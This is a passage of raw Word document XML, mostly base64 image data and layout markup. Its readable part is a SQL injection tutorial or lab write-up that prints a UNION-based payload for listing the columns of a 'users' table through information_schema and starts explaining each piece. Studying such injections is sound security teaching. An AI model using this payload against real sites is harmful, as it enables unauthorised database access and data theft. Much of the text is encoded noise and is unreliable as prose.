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&#10;NFknYMAUVmCg4zkjcwHHTIoAqUV1Gh+BX1C7mtr+8TTLj7A1/BCU815lEDzLwDhQVTqxBG5eDmsn&#10;w7oj+ItYgsElWASBneZwSI0RS7sQOuFVjj2oAzaK3Nd8P21hptjqenXsl/p11JLAHmgEMiSx7Sys&#10;oZh0kQghuc9sVcsvDmiX+gX9+mrahHNZW6vIkunIITK3CxCQTknJzg7OiscDBoA5eiiigAooooAK&#10;KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoo&#10;ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii&#10;gAooooAKKKKACiiigAooooAKKKKACiiigAooooA7a51rwvqtvoMuoPqjTadZJay2UNtGI5iru3Ex&#10;lyoO7H3DWzofxQ0q31u11y+snGp/2lJfXaxWUMvnhnDAJLId0W0ZACjnH3hnI8wooA7aLxlp1pLp&#10;qxLdyQ2ei32l72jVWd5jc7GxuOBidM88YbGcDLLjxnZS+E/7LWK4Fx/ZUVjuKrs3revOTnOdu1gO&#10;mc9sc1xlFAG14s1qDXdQtZ7dJESKwtLVhIACXigSNiME8Eqce2OlbOt+OrfUfDVlbQQSpqsnkjUp&#10;3xtmEClINpzk/KRuzjlQea4yigD0xPiFoNtrmo6nFHqLvqGuW2ryRvDGoiVJXkeNTvO4/PgE4zjo&#10;KzIfHVhHrGgXRiufK0+wurWVQq5LyvcspX5umJkznHQ9eM8NRQB6BqHxEgvdIPltJbX7abHpzxR6&#10;bakMFjWIn7SR5mCq/dxwTgMBiopPGOi3viHXL+4t5lN3HEtrPJZxXRhKhQ2YnYIchcZycenPHCUU&#10;Aeka/wCN/DviS21KCb+0rNb59PlzFbRN5LW9u8LKFDqGBypGNvU8DaAZv+Fr2Q1IXIs5ghvbt2R0&#10;STEEtqluvDZDOApYgjaenQmvMaKAOj8XeI4tZisLa3nee2tQ5G7T7eyUM5G7EcOR0VeSx/CthfiN&#10;Ha+G9BhtoZV1iwuIXnnbASSOB5GhAOc5/ekHI6IvWuEooA9Jn+JGljWtSitLaa30KawisbUTWkNx&#10;JAEdZNxiclGy+84zxuBzkVUuvGulatYavp9/Pf8Ak3P2NLe5gsoEKLCJM5hRkUAl+FB4HVjjB4Gi&#10;gDqNS8RaZrPjuPU7y2nOkK8KtANplkiiRUAPIGWCDPPGT1rX034iT6/fXltrUVuyX88c8b2djBE6&#10;3Kygo7MqqWGDIpyScOTya4CigD2fStb0y0+KcmnWX2uW61DxVBNP9ojVUhEc7/KpDEvkv1IXAHQ5&#10;rl9J8aaN4ftobW1W+uIWluriZ5okVkaS2eFEUBzuALkljjP93iuAooA7298ZaLrmkppd8L+2tkis&#10;WE9vCkj+ZBbmJ1Kl1G1skhs5GOnNWvC/jrw34em0+eOxuYWt55WmQ2kFxLKjMdjee5DKyoQNqqAx&#10;XqN3HnFFAHdjxnpUGnwJF9se4i0ebStrwIEJM7SI+d5PIbBGOCOC2aszeP8ASI9X1bVII75rnWLy&#10;G5uYZY0CW4WdZnCNvJcllAGQuBXndFAHTap4ntb7RdZtEjmEt7q638bMBgRhZgQefvfvF9Rwea3d&#10;D1uDTLXwNrrrJNa6FdtDeRwgF1/fGZTgkD5lZgMkcxn0rzyigDqxrOiaDpeqQ6RLf397qMP2V572&#10;3S3WGIurNtVZJNzHaBkkYBPBzxNrHja31Dwfb2EcEqavKkNvf3LY2SwwbvJA5znBQNkf8sk9646i&#10;gDv1+JMFvpPhhYIJRqNhPDJfOwGydYCwgUc5PySMpBA6DrRqXxCsLe51SbRrZ0L29vp1il9bRSpH&#10;aIv7zerblLs6qehHLc1wFFAHpGgeJI9b1nSdauoxDcaLaTNfSxwRwwPGoPkBVTADEuIsBR0Xrzjk&#10;/B+tWui6s5v0lk0y6gktbtIAC5jdcZUEgEq21hk9VFYdFAHdaT4u0ibxjqmu6pLfWwnS4gt7aztU&#10;mCxyQPCoJaVMbFZcDBztxkVlaDq+leGtZt7yBry9jDzwTLJEkRe2ki8vIw7YfDyccgYXk5OOaooA&#10;6nUtX0STSrDRrWS/bTrZ7m6e5kgRJZJ5EVVGwOQEHlICdxPLHHQVn3GswHwjZaTAkizC7lurpmA2&#10;vlUWIA5ydoEnUfxmsa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D//ZUEsDBBQABgAIAAAAIQDre7Wn4AAAAAoB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEjcWNJRylaaTtMEnCYkNiS0W9Z6bbXG&#10;qZqs7f495gS39+yn58/ZarKtGLD3jSMN0UyBQCpc2VCl4Wv/9rAA4YOh0rSOUMMVPazy25vMpKUb&#10;6ROHXagEl5BPjYY6hC6V0hc1WuNnrkPi3cn11gS2fSXL3oxcbls5VyqR1jTEF2rT4abG4ry7WA3v&#10;oxnXj9HrsD2fNtfD/unjexuh1vd30/oFRMAp/IXhF5/RIWemo7tQ6UXL/nkec5RFkoDgwFIteXBk&#10;EccKZJ7J/y/kPwAAAP//AwBQSwMEFAAGAAgAAAAhABmUu8nDAAAApwEAABkAAABkcnMvX3JlbHMv&#10;ZTJvRG9jLnhtbC5yZWxzvJDLCsIwEEX3gv8QZm/TdiEipm5EcCv6AUMyTaPNgySK/r0BQRQEdy5n&#10;hnvuYVbrmx3ZlWIy3gloqhoYOemVcVrA8bCdLYCljE7h6B0JuFOCdTedrPY0Yi6hNJiQWKG4JGDI&#10;OSw5T3Igi6nygVy59D5azGWMmgeUZ9TE27qe8/jOgO6DyXZKQNypFtjhHkrzb7bveyNp4+XFkstf&#10;KrixpbsAMWrKAiwpg89lW50CaeDfJZr/SDQvCf7x3u4BAAD//wMAUEsBAi0AFAAGAAgAAAAhAIoV&#10;P5gMAQAAFQIAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAA9AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAZFE3QmQCAAAkBwAADgAAAAAAAAAAAAAAAAA8AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAK&#10;AAAAAAAAACEAMJAzKUJBAABCQQAAFQAAAAAAAAAAAAAAAADMBAAAZHJzL21lZGlhL2ltYWdlMS5q&#10;cGVnUEsBAi0ACgAAAAAAAAAhAIbv/C2OQwEAjkMBABUAAAAAAAAAAAAAAAAAQUYAAGRycy9tZWRp&#10;YS9pbWFnZTIuanBlZ1BLAQItABQABgAIAAAAIQDre7Wn4AAAAAoBAAAPAAAAAAAAAAAAAAAAAAKK&#10;AQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAGZS7ycMAAACnAQAAGQAAAAAAAAAAAAAA&#10;AAAPiwEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABwAHAMABAAAJj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5" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:2161;width:23034;height:20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4m8wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ra8Iw&#10;FIXfB/6HcIW9zVSHY9amIoIwxoS10/dLc22CzU1pMu3+/SIM9ng453yHU2xG14krDcF6VjCfZSCI&#10;G68ttwqOX/unVxAhImvsPJOCHwqwKScPBeba37iiax1bkSAcclRgYuxzKUNjyGGY+Z44eWc/OIxJ&#10;Dq3UA94S3HVykWUv0qHltGCwp52h5lJ/OwVV5k67D3vSXH1ubVi+r2JtDko9TsftGkSkMf6H/9pv&#10;WsHzEu5f0g+Q5S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA1NeJvMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId38" o:title=""/>
                </v:shape>
                <v:shape id="Image 36" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;top:20711;width:46798;height:38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pnxgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKE3zWrF6tYoRVoQaw9dPXh83TyzWzcvyybq2l9vCoUeh5n5hpkvW1uJCzW+dKxgOEhA&#10;EOdOl2wU7Hdv/SkIH5A1Vo5JwY08LBfdzhxT7a78SZcsGBEh7FNUUIRQp1L6vCCLfuBq4ugdXWMx&#10;RNkYqRu8Rrit5ChJJtJiyXGhwJpWBeWn7GwVvB9+vm5P3+Zjf9qYjdxmoXwdz5R66LUvzyACteE/&#10;/NdeawWPE/j9En+AXNwBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwF5qZ8YAAADbAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId39" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="467947B9" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C16E3B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'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1=0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union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select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'Table: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',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'Column: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 xml:space="preserve">', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'users' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEA818" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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9104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E56122B" wp14:editId="2703D5B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729950" cy="2333625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9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7398AE" w14:textId="77777777" w:rsidR="002D34AF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178"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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Ends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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>string, allowing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>us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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>raw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10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>logic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after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B51DA2" w14:textId="77777777" w:rsidR="002D34AF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163" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="676" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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dummy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>condition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always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
